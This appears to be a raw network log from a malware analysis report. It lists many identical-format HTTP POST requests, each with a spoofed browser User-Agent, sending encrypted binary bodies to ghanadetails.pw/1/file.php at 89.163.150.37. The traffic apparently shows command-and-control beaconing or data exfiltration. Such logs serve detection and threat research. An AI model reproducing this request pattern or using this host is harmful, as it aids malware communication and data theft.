L;\xa6n\xabeI\x08\x00\_\xd8-\x05\xf5\x94\x88?\x88>_8\x97\xc0\x13\xdf\x1f\xec\xd0\xd2\x89x\x08\x9d{\x84H\xfaq{\xe1y\x919\xfcO\xe8]\x8er\xfa\xda4$[q\xc8\xa8r\xbb|\xad \x8f=\x91\xcd\xa1\xa8\xa0\xdcK\x07W!\x8f"v\xb2\xd0\xd3J\xfe\x84u\x0c\xf0X\xa6v/\xa2|p/\xd1\x85\x01\xebp\xe8;\xaa\x0b;\xd8\x11Y\xec\x8c\xbe\xd2\xbe\x8d!Ftib\xa5\xe1\xba\x8e$\xe5\xcfGJ\x15\x99

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xb2\x7f\x85A\xe61\xfd\x8d\xdd'\x9d\xb1\xe3\x91`\xfb\x83'\xf2\x1f\xeaP\xb6\x0e\xa1\xa0\xac\xc1\xb28*Z\xd4\xfbz\x89'\x8c\xe7\xdc\x1e qr\x10\xf9_\x10\xa7H\xa2\xd9\xa3nX\x9dX\xf5\xe3\xb4<e\xa1\x8f\xc3\xd5\xee\x8e\xe5\xf4h\xce\xda,\xe3\xe6\xec\xe2'\xbf\xd8R\x84\xa5\xc0d\xd1\x96\x14	\x9c\x8f\x1e\x9a\x8c\xf3Yg\xea}\x87M<\xac\xc4\x81\xf1\x12\x00:	\x9f\x97\xb7yE\xe3#aIq\xe7\x1f+\xa5\x07\xc6J\xeb\xdd

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

1\xb5\xcc\xf0o\x00M\xd1\xd2\x01\xf7\x03\x102I\xa7\x98\xe3C\xa2\x9f)\xd5\xb5\xc7\xbd\x81R\x0f\xaf\xf1\xa4\xa5\xc3\xc1\xca\O\xa5r\xe3\xf4\xe92yF\xb9\xd5p\xe6AM\xa0\x03~'b\x87\xfbW\xf1\x82
\x01\xce\x91)\xb1\xe2KV\x1c[\x84\x07\xda\x91\xcf\x80mM\x18\xbb\x96;\x93<\xa3\xfc\x9a?\x92-\x83\xd9\x83\xaa\xdd\xd3\xbc~\x0c\xfc\x80\xbb\xd7\xeb\xd0\x83\xe9P\xb3\xfc\x03\xb8\x88\xf2>f\x96g\x8aB\xc8|\xf3=\x83\xbf\xf3\xbc\x84\xac\x90\x1e\x1b\xab#\xe6\x98\xbc\xe7

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xa7\xe67Ke\xa9\xbbkT\x91\xfb\x88\x03bf\xda4,\xbb\xa5\xf3Y\x03\xc7\xf9\xa58\xe0w*1\xcdZ\xf9S\x18?\x8f:\xa1\x0c
\x8c\xd0\x03\x7f\xff\xc1\xb5@\xd0#\xa5\x1a\xc1<5\xf6+\x8c\xe0n\xa3\x01X\xc2\xd2
\xe8\xe2\xa0\xa6\xdd\x14\x0bQ\x82\x9f\xaf\x10\xe1\xd7C\x91W\xe3\xea\xd1\xc2\x82\x86 U\x06\x19\xeaU\xe7An\x1d\xcccST.\x8e2\xf9\xd0\x16\xa79\xa5)\xe6\xf7'\xd9\x8d0\xfb\x92\x13m\x1f\x94\x83)\xa0G?\xa69\xe8\xa1-\xb3\xea\x13\xaf\xb7

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

0\x120\x9b\xdb\xbdN\x83\x82\x8fN\xf3\xe9*e7\xfa+q\xc1\xdf\x89	8X\x06O\xada5\x85[[\x9b\xc2^\x17
Y\xdfL\x85\xaf=\x7f\xa1j\xba\xed\xd1\x8c\xd1\x1f\]U\x02\xc3\xcaW`\xe7\x81\x01\xcf6\xd5\xdaV\xf6UN\x0b
\xbe*h\xd7\xac\xfd/\xd0\x89\xf5{3\xe0.c!\xf1mC\x19\xad|T\x85\xd0(5N\x00-\x14\xa6\xad\xdf\x85\x0e\x83\xdca4u\x14MaE\xe4\x07\xces\xc8\xed\x96\xb6\x83\xbeT@\xef\x18-\x1dI\xfb\xad_hE\xff

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\x13\x05~u!\xa6\xc7\xd9\x97u[\xa5^\xf7j\xde\xee\x8ea\x06%\x80\xe1\x07/J\x8da\xbc\x0f\xe9\xa8\x94``\\x01\xfa<i\xb5\x93V\x87\x10\xc8\x9d+X@\xf9\x9eHQ\xc3\x96B\xcc\x00\xd8\xfe\x9e\xae\xb1\\x91+\x84\x1c]l\xa4\xae@\x1b\xcco\xba\x13\xa4\x8b\xc5)\x821\x8a\xb8\xa1\xa4\xdd\x83\x11.\x93q?4\xd1\xdd\x85\x8c\x16\xca4B\x1f\xfb\xcaq\x90\xcfv6\xd2&\x90\xf3,\xe9\x9f3\xc1\xf2Gs\xef\x993-\xf3\xae\xaeJ\x946\xf4
\xbe\xe9\x85J\x9b\x0f\xf1\xfc

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\x1d\x82",\xaa\xf1 \xd8\xbc\x0f\x01D\xcb\x9fi\x02\xcfH\xc3\x08[\x11\xd5,\x08\xf4\xaf1\xa2}S\x8f\xbd\xc0\x1b"\xad\x8a\xfcO\xb9\xce+A\xa2\x87\xb9\xd0^\xa1|\xb7\x11\xe7\xd0\x9aBU\x05\xaf\xc7\xcb3\xb1R\x16w\xdd\x97
\x8b\xa5\x85:A-\xfa\xd2\x10x\xaa\x03\x8b\x8cO\x1b\x8c\x8a\x83c\xa1A0\xe1\xcb\x18\x1dq\xa6\xfb f
\x12NB\x86\x0c\xc3\xdf\xeb\x8d03\xa3\xb9\xaa\x9a\xfa\x933X\xf70J\xba\x043#t\xf2\xf7\xc1\xc3\xd1\xf5&\xc4\xb3d\xdf\xf3\x0c-\xdd

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

Fi\xd7L1\x0b\x9f\xc8\xbf\x8c\xde\xa6\xe3e\xa2\x0f\x90\xe2H\xc8\xa1jt\x86\xb6\xf2=\xd8.\xdc\xfb\x03j\xa7b\xce\xba\xfc\xcf\xd36\xc1x/\x06\xf1\xfeQ\x8d\x87{\xfbg\x10\xfd\xbcp\xdf\x1b\xca\xc7\xe6\x17\xb1	\xfd\x82\xbd\x0c\xf04\xb5\x86\xb9\x9e\xcf\xd2(\xdbu\xf5\xa9\x00L\xb5`- =e3\xa8\xbc@c\x94\xca\x16\xdf\x177\x109\x8e\xc1M\xd5bg\xa9\xac\x0c\xe3\x15\xa4\xf5\xdcm\xd7\xb5\x01\xd2\xe9UJ\x97 3x\x9f\x07\x97Z9n\xe5%Gl\x86\xf7	\xc7 \x82

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xfa\xb0\xcb\xbd\xd2\xcf\xfb\xaadYw\x14z2]\x0f\xb2\xb86\xb9\x00\xae,4,\xf5\xa6\x162@/P\x9911p\x16w\xe4\xfe\xa2[\x9e\xd2\x1d\xc7\x1e\xf4\xcd\xa3\x9e\x97HI\x1bdhH[l\xb3\x12\xab\x8a\x8e\x1f\xa5w\xd4\x0fk\xecfW\x0cFpD\x1fN\xec\xc8E\x06/\x9fN\xa9\x9cY\x93]\x9b\xe7\x8c\xfc\x1e\xa7\xab\x8e\xbc\xbc5\x84r\xf0\x14\xb8\x96\x96;d\xa9'\xb2\xec\x11\xc5\xe3k\xf3\xbd\x1a\xf3>c\x9c\x08\xff}.C\x91\xd9o\xe4\x9b\xf6\xfa
Z

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xe7J\x1b\p_\xa2\x1b\xc1C\xc5\xccos\x81\x0ex\xb5-\xec\x12\xea\x83\xfd\xf8\xaf2\xef\xfe\xa2\x7f\xc8\x1cSy	,\x7f%\xd7\x9f\xd9\xb4\x92\x90\x1eZm\x9f6\x1dZ\xc2\x95,5$\x8aW
\xe7hc\x8a\x93\xe5u\x96v\x9f2]\xc3M\xbe\x9ee\x05\xc3O&\xc5^S=\xdb\xe1`H\x03\x07\xa4W\x05\xdcd\x9b\xc5\xe3\xf7\x86\xb4\xf4\xadOr>\xf8\x1bO\x7f\xfd\xfb\xb21!\x9b\x19\xd4:\xbf\x7f\x16\x92j\x19T\x08\xe2\x87\xfe\xa23I6U>\xecH\xd2O

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xea\x1cp\xf4\xde.\xf5\xe1y\xf1\x8a\x17\x0e\x9e\xbe\xd68\x81\xa8\xce\x9e\xe8\xab\xe2\x04$#\xe7\x83F\xa7\xdf\x06\x12\x05\xb6\x95\x19e:0|\xec^\xe6\xe4r\xa2\xc8\x15\x8foY\x80\x13=\xcf\x16Q\x12\x8d\x9b\xac\x8a\x9e\xb3\x1e>\xd8\xeee\xa7{\xff\xf1E\x04\xe8\xfc\x97f\xf1\xdbq\xb1\xd9\xc9\x7f\xb4\x88\x16\xac*\xe1\x04s\x81\x84\x9fH?\xd2\xb4@\xe0\xd7f4m\xb5W2\xac\x91\xa3\x14\x00\x0c\xeb2T\xe3\x10\x8d\x00\xea\x9b\x08\xef\xd1\x95
\x9d8a\xaf\x86^\x07	.

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\x90:\x17O
\x1c\xab\xdf\xdf|\x1dg\xa8\xe1\x01\xd7%

\xdcK6#\xb9\x98^\x82S\xf6D\x9d\xd8t<j\x05I#3\x0c\x9e\xf9s&\xd9\x0b\xbc\xbe\x83\xe0\xdf\x98\x80\x8aO\xa8\xe3\x89O\xa4\xfa\x9b\x94\x8f\xe1\x90|\x80	\xd9>\x9c\xd8wc0\xa7\x92F\x93~x{fa\x02D!-\xf7\xb2\x1dZ\xe6;q\xf9\xa0\xfa\xf1\xe9\xe2\xe8|DX\xf3F\xc9\xc8\xea1\xb3\x1f\x04\x04\xc0\xc7v|\xca\x9b\xb3;c\xf9\xf3J\xc9\x98

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xa5]\xa5\xa9\xfc\xe0\xa6a'=|\xd9:?\x97\xe3\xb0\x0e\x85\xfe\x8f=\xd8\x99\xe1\x1a\xf6\x12\xf9
l\x19\x80\x9a\x19"~\x1e\xffs\xa7y\xd3Y\x8a\x14\xebK\xd7"\x96{\x85@uI[\x0c\xfa$4\x14\xa4\x8f\xd4\xf7\xcef\xff%3" 6\x02\x8e5L\xd0\xa7\xeb{\xf3D\xa5	\xbf\x01T\xb3\xc6\U\xa8\xca\xb0
\x06\x89\xd6\xde\xdf$\x03}\xd8S9\x9a\xd7\xbd\xc4\xe7\xddM\xe7\xc5
L\x9dr\x1e\x06\xbb\xadv\xc3J\xfc\xff

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

}\xbcE\x12N\x05\x8dlz\xf2`;$\xf1br\xb9\xb0t\xad\xb7u\xb2mwK\x86\x83\xa6\xa9\xcd\x1d\\x7f\xfd\x9d\xc8\xff\xd0z\xfe\xb2\xcb\xbf\x90\xde\x1a\xde\xda\x98c,\xb9\x0c\x1b\xb9\xc9Y\x8e\xb1o\xb3\x01\x8f\x0c\x16.\xddM\xc0\x18/}\xf9\x1el+\x82%6\xe2\xc5\x02\x17\x9dA\xd5\xf5\xc2\xe2\xb6\xcd
\x0bk\xb4\xd1\xe3mih>\x0b
$\x13K\xdf\x80\x1dLQ\xeag\xb8\xb0\xf9A"m\xe0Kr.\xf6\xd1fJ$\x1e

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xc9\x058\xbc7\x9f/\x9bF\x08\xe1\x88&\xe7O\x92\xc5F\xff\x1c\x85\xc2\x01\xbc\x19%\xcb\xab4l\x1af\x9f\xb1\xf7D\xc6\x12\x05\xfa\xb5?={\x8dQ}"\xef\x81?1x*h\xec~\xddsl\x08\x83#\x016!\xdd\xfd\xba\xd44V\xcf\x8d\x11Q\xa7\x1a\x86X\x10\xbd\x07(!x\xe8\xaa"\x02uk\x16@2A\x90\xaf\xe52\xe4Q\\x08\xed\x1c?\x99w\xfe\x94Dcd\xc6\xf4*\x17p]{\xd0\xca\xf3\x85\xf2\x14\x83GCH\xc8\xf4\x0f|Q?*\xf0\x13\x8a2

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xc5\x0c*\x94?\xb7\x94\xd6\xde\xec\x06\\x89\x81G\x8ec(\x04~\xfe\xaf\xC\\x07\xe3\x9e\xba\x17\xb3Fm0\xb9\x1b\xefkb\xf8\x0e\x0fz\xf7\xe2\xa0\xeb\x9c:\x11\x86\xd6\x92\xe0\xfd\xf1qj\xf1w\x80\xfb\x01:(\xcf\xd5\xb2\xfc\x8f\x1bWi\xf6\x85\x08|\x8eD\xb6\xd3\xfcJZ\x15\xb5nx{\xb9#\xbc\x96?\x94Is"\xcf9\xac2\x90\xa0-
\x98
MI\x8d\x10\xdf\xe8C\x84\xaf\xf8L\xf4|\xd3n\xfa\xf1\xcc\x83KJZ\xe0\xfc'\xc7\x1c\xa7\xce\x17\xc7%T

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xbbdU\xb0\xb7\xa77\xf5t/\xabK\x1f\xe3\x07\x97X\x86\x17\x16\xad/\xd3\x04\xda\xe7\xae\x01\xd84\x83\xb6=\x00J\x98\x96\xfa\xcdDW\xc8\xa7hd\x85\xe5\xf7\xa2\x91\x07\xeb\x80\x17j\x84m\xcf\xc6\x164\x0bj\x01D@\xb0\xf1:\xec,8\xfd\xaa[\x92\x9e\x1e\xce]\x8d}\xef"	\x95:\x12\xe1\xc0\x10\xc1\xfa\x18\xab\x912\x1eX\xee\xb4\xb9\x94\xb6\x0f\xeb\xa5\x8a\x9e*\x0c\x91.t\xfe.\xd2*r5h\xc2\x7f\x89\xb9z]\x835"%\xc4t7d?

\xba\xd0\xb36

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

 N\xfc\xb9>s\x11\xf9H\xefJ\xca\x1b\x08\x81\xaf\xee3\x9d\xae\xc6\xcb\xdc\xac\xc2\xdd\xe2\xa6\x997a>1\xbdt\x06\x88\xb9|\xdf\xfc\x9f\xd1~\xc3\xa1\xe0\xcc\xcek\x93\xa0=\x8ch\xab9\xcd\xf9\x89M0\xb0\xb1o\xda\xa9H\x03\x88\xba\x84q\xda
\xa3*E\xf8\xd5\x8bx\xd5*\xd2\xc1\x85
IJ\xec\xd6\x0b\xab\xf9\xa9\x91\x0c\xc9\xdf\x05U\x8a\x82\x0b\x13|3\xa2\xf9\xb2\x91\xa0\xf9L\xae\x86\xf1B\xa2H\xc0\x0b\x16\xc0A\x873\x1e\xb8,bUA\xe0\xd4\xd2$\xf8\xea\x0fd\xe4\x80\xfc

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xb6\xf9L\xfa\xae\xa5\xd1\xaf\x81\xe0\xbf\xb80\xac/\xa4t\x9dP^&\xf2{ZS\x057AU%^\xdbB\xef!\xa0\xfd\x8aYl\xd0u\xc1\xe9
\xe0\xab"\xb1 \xbb\xb58P*\xb8M\xf0\xc9\x8bd\xc7j\xb1\xf9m\x19\x0b\x93^z\xd2\xb8\xd5\xff\xd1\x01\xe1V\xde\x11\xd6\x18\xda2\xf8"\xfc\xd8\x9291\xc7\xb9\xc6L\xe2^\x9cypf\xaf1'\xf9l\xa4l\xb8\xf9\x7f\xdf\xb2d\xbb\x83-\x00\xb1<\xfd;\x14\xe9\xb6]3\x88\x0f\x9c!\xc5\x97 \x82\x1b+
\x98$\xc0J\x8bf

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xc76\xed\xc2\x86p\xdb-l\x01k\x85I\xf0\
\x0c\x14Vg\xb5\x90\xe7\xbf\xf1\x8am7/\xc0#\xea\x02\x11\xb1\xa9\xe4nb\xdf\x0c\xa5$\xe5E\x8d\xe9\xbd\xf8\x98\x8c\xbd\x9a\x03\x87l\xdeN\xa2\xcc/\x13&\xb1\x88\xa2\xb83\xbb\x8bpPU4+\xecx\xbd%pi_\x1e\xe3\xa1\x9a\xbe\x19z\x1dcG\xbd\\xbb}\xa2\xa0\x0cpi\x82\x94\x82\xfb)\x89\xa8$\xd5\xbb\xe0\x96
S\xb3!~\xade\xafCPS\xa2b\x113\xf9\xc0=\x19\xedB*\x00\xf6\xca\xd9\xa5]\x9c9%\x1e

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xc6\x1e\x02\xf0;\xf4y\x10;\xe9^k\x15!\xbc\xac\xf6\xcd,<O\xe35G\\xce\xec\x00\x85\x95\xd8%\xd0\xea\x8dH\x8a9\x131\x88\x9e\xc2\xd8\x07\xa1\x8a"\xfc\xa3\xf1grqwbm\x06d\x0fq\xb2)\x8a\xb2\xb1l:=4\xe9V9\xe7%9\x1fW\xfe\xed\xa8\xbd_\x83`\xd2W\xda\xecb\xd9K,2{\x89W|\x17\xb6 \xf2\xc2KX5H\xb2\x8c\xf0\xaf\xb2\x98'\xdd\x1c+\xfd\x8fm\xf6\xf3%\x90\xfc\xc3\x1e\x08\xc3\xd3\xe7\x0ex\xe2\xed^\xc4F\xd3u5

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

`\x109Q\xd0\xcd\x92}\xc7\xc0\x9f\x8f\xd9\x06\xdf\xfe\x8f\xeb,-\xca)U\xc9bQov\x02[$|/\xbd\xef\xb08Y\xa1\x05-\xeeZe\x92\xdf\xb0)\xdc\xdc\xa8/\xae\xe2N\xb5
\xc0\xbe \xaf%\x8c\x8a\x14\xbfW\x9b\xd6
\x02;\xc5\xce\xe4\xdd\xd3p\x9d\xbf\xd1\x9b_\x92\xe5\x187T\xd2\xfdZ=\xab\xfc\x87\xd0\xa8+uN\x92\x92p\x7f\xfdE\xd0\x0f\x19\x8e\x95\xb9\xb8X\x84T\xf7n\xb6\xba\x915\xff\xbf"T\xbb\x08e\xdd\xdc\xaf\x93\xdb\x0638o\x12\x91\xf9

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\x814\xec\x8b\xc8\xdd\x15\x8f\x18%\xaf\xf4s \xe7\xccv*\x80\xcfJzA3\xba\xb6\xa5M\xa7\xdd\xe3\xc1s$\x87\xd7\x9d\xf4\x9bJO\xb6\xd7\xa3\x85D5\xa6\x98\xa0\xb9p\x93\x0c\xe7\xf2o\x9a\xc9\xa6\xb7\x1e\xf6\x8a\xf5\x9b\x82A\xce\x1d\x85\xc9\x1a+\xd4\xa6yV\xa5\x8d(Z\xf3peK#\xae
\x1a\x90\x06\x0ez@m\xf4\xb2\x1d)7?J0\x9f\x1d]\xc9\x0e\x15\x106\xfc$\x95\x0b\xca\x80\x1f\xfd\xf4o\x889:o\xc1\x08\x84\xf9	u\x8b\xcb\x81\xc1\xe7\x8a"\xeaS

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

{LT0$:\x98\x85\xc9KxV'\x8a\x8a\xa9]\xbd\x01\xe2\xdcG@\x17\xd7f\x97\xb2\x03\xd4\xd67p\xa5\xc6\x95\x88\xea\xef\xb9g!\xf9\xf8\xb9\x8f\xd8/\x14\xbf<I\xf8\x14\xc3\xe9C^\xb5\xaa\xe0\xe40\x8f
\xe6?\xff'\xff
